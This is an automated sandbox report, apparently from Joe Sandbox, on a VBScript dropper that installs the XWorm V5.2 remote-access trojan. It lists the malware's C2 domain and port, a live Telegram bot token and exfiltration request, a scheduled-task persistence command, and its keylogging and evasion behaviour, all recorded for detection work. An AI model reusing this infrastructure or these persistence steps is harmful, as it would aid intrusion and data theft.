Windows Analysis Report
SOA-injazfe-10424.vbs

Overview

General Information

Sample name: SOA-injazfe-10424.vbs
Analysis ID: 1526836
MD5: d1d114a2cb6d4a5fcc20e0db06755948
SHA1: eafdcba5d2d41934ae19628ac35675f7fce924c1
SHA256: f71d04f863721491823b5ed2b83d2f30d67084025bf7ea9fc52c615ba0fd3040
Tags: Formbook, vbs, user-abuse_ch

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
PE file contains section with special chars
PE file has nameless sections
Potential malicious VBS script found (has network functionality)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6296 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WindowsApp.exe (PID: 1204 cmdline: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" MD5: 0C3A47BC813554D40583861DDCDE06B8)
      • schtasks.exe (PID: 3452 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 8092 cmdline: C:\Windows\system32\WerFault.exe -u -p 1204 -s 3304 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • task.exe (PID: 7172 cmdline: C:\Users\user\AppData\Roaming\task.exe MD5: 0C3A47BC813554D40583861DDCDE06B8)
  • task.exe (PID: 7352 cmdline: "C:\Users\user\AppData\Roaming\task.exe" MD5: 0C3A47BC813554D40583861DDCDE06B8)
  • task.exe (PID: 7480 cmdline: C:\Users\user\AppData\Roaming\task.exe MD5: 0C3A47BC813554D40583861DDCDE06B8)
  • task.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Roaming\task.exe" MD5: 0C3A47BC813554D40583861DDCDE06B8)
  • task.exe (PID: 7912 cmdline: C:\Users\user\AppData\Roaming\task.exe MD5: 0C3A47BC813554D40583861DDCDE06B8)
  • cleanup
{"C2 url": ["isika.ddns.net"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=7062075018"}
{"C2 url": "https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security |
0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen | matched strings:
  • 0x12cc:$s6: VirtualBox
  • 0x125a:$s8: Win32_ComputerSystem
  • 0x1ac0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1b14:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1ba4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1798:$cnc4: POST / HTTP/1.1
00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |

            System Summary

            Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", ProcessId: 6296, ProcessName: wscript.exe
            Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\task.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, ProcessId: 1204, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\task
            Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, ProcessId: 1204, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\task.lnk
            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, ParentProcessId: 1204, ParentProcessName: WindowsApp.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe", ProcessId: 3452, ProcessName: schtasks.exe
            Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\WindowsApp.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6296, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe" , ProcessId: 1204, ProcessName: WindowsApp.exe
            Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA-injazfe-10424.vbs", ProcessId: 6296, ProcessName: wscript.exe

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-10-06T16:45:11.941778+0200 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.7 | 49701 | 149.154.167.220 | 443 | TCP
            2024-10-06T16:46:25.707078+0200 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49621 | 45.88.91.147 | 7000 | TCP

            AV Detection

            Source: SOA-injazfe-10424.vbs | Avira: detected
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Avira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Roaming\task.exe | Avira: detection malicious, Label: TR/Dropper.Gen
            Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["isika.ddns.net"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2", "Telegram URL": "https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=7062075018"}
            Source: WindowsApp.exe.1204.7.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage"}
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\task.exe | Joe Sandbox ML: detected
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: Binary string: .pdb} source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb_b9 source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C142000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdbH source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Xml.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb1&0 source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbra source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B516000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.pdb@w^ source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.pdbp source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: *Win32_OperatingSystemblib.pdb A source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbwA source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: 0C:\Windows\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.pdbq source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C142000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C130000.00000004.00000020.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2432794842.000000001C197000.00000004.00000020.00020000.00000000.sdmp, WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: WindowsApp.exe, 00000007.00000002.2432794842.000000001C155000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Management.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Drawing.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: mscorlib.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbVa} source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B516000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: msymbols\dll\mscorlib.pdbpdb` source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: orlib.pdb source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbm source: WindowsApp.exe, 00000007.00000002.2433622723.000000001C948000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.ni.pdb source: WER2B9E.tmp.dmp.23.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER2B9E.tmp.dmp.23.dr
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Code function: 4x nop then dec eax | 7_2_00007FFAAC4E7EDD
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Code function: 4x nop then dec eax | 7_2_00007FFAAC4E3799
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Code function: 4x nop then dec eax | 7_2_00007FFAAC4E9D77
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Code function: 4x nop then cmp dword ptr [ebp-58h], 00000000h | 7_2_00007FFAAC4E07E8
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Code function: 4x nop then cmp dword ptr [ebp-58h], 00000000h | 7_2_00007FFAAC4E0235

            Networking

            Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49494 -> 45.88.91.147:7000
            Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49621 -> 45.88.91.147:7000
            Source: Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49701 -> 149.154.167.220:443
            Source: Malware configuration extractor | URLs: isika.ddns.net
            Source: Initial file | binaryStream.SaveToFile executablePath, 2 ' Overwrite if file exists
            Source: unknown | DNS query: name: isika.ddns.net
            Source: unknown | DNS query: name: api.telegram.org
            Source: global traffic | TCP traffic: 192.168.2.7:49712 -> 45.88.91.147:7000
            Source: global traffic | HTTP traffic detected: GET /bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=7062075018&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A662C920EC437F040F44A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%201YPBEL4ES%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 208.95.112.1
            Source: Joe Sandbox View | IP Address: 149.154.167.220
            Source: Joe Sandbox View | ASN Name: TUT-ASUS
            Source: Joe Sandbox View | ASN Name: TELEGRAMRU
            Source: Joe Sandbox View | ASN Name: LVLT-10753US
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknown | DNS query: name: ip-api.com
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic | DNS traffic detected: DNS query: ip-api.com
            Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
            Source: global traffic | DNS traffic detected: DNS query: isika.ddns.net
            Source: global traffic | DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: global traffic | DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
            Source: task.exe, 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=70620
            Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: 12.2.task.exe.12fce598.5.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: 12.2.task.exe.13f0000.2.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: 12.2.task.exe.12f80918.3.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: 12.2.task.exe.12fa7760.4.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: 16.2.task.exe.122c9ac0.0.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: 16.2.task.exe.122f0908.2.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: 16.2.task.exe.12317740.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Window created: window name: CLIPBRDWNDCLASS

            System Summary

            barindex
            Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: WindowsApp.exe PID: 1204, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: task.exe PID: 7172, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: task.exe PID: 7352, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: task.exe PID: 7480, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: task.exe PID: 7532, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: task.exe PID: 7912, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: WindowsApp.exe.2.drStatic PE information: section name: dCocB{
            Source: task.exe.7.drStatic PE information: section name: dCocB{
            Source: WindowsApp.exe.2.drStatic PE information: section name:
            Source: task.exe.7.drStatic PE information: section name:
            Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4DEDF67_2_00007FFAAC4DEDF6
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4DDF5A7_2_00007FFAAC4DDF5A
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4DF3B27_2_00007FFAAC4DF3B2
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4D85D87_2_00007FFAAC4D85D8
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4DD7DD7_2_00007FFAAC4DD7DD
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4E51A17_2_00007FFAAC4E51A1
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4D18CB7_2_00007FFAAC4D18CB
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4CFE797_2_00007FFAAC4CFE79
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4D19247_2_00007FFAAC4D1924
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exeCode function: 7_2_00007FFAAC4D11A97_2_00007FFAAC4D11A9
Source: C:\Users\user\AppData\Roaming\task.exe | Code function: 16_2_00007FFAAC4C07C5
Source: SOA-injazfe-10424.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1204 -s 3304
Source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: WindowsApp.exe PID: 1204, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: task.exe PID: 7172, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: task.exe PID: 7352, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: task.exe PID: 7480, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: task.exe PID: 7532, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: task.exe PID: 7912, type: MEMORYSTR | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: WindowsApp.exe.2.dr | Static PE information: Section: dCocB{ ZLIB complexity 1.0003641419491525
Source: task.exe.7.dr | Static PE information: Section: dCocB{ ZLIB complexity 1.0003641419491525
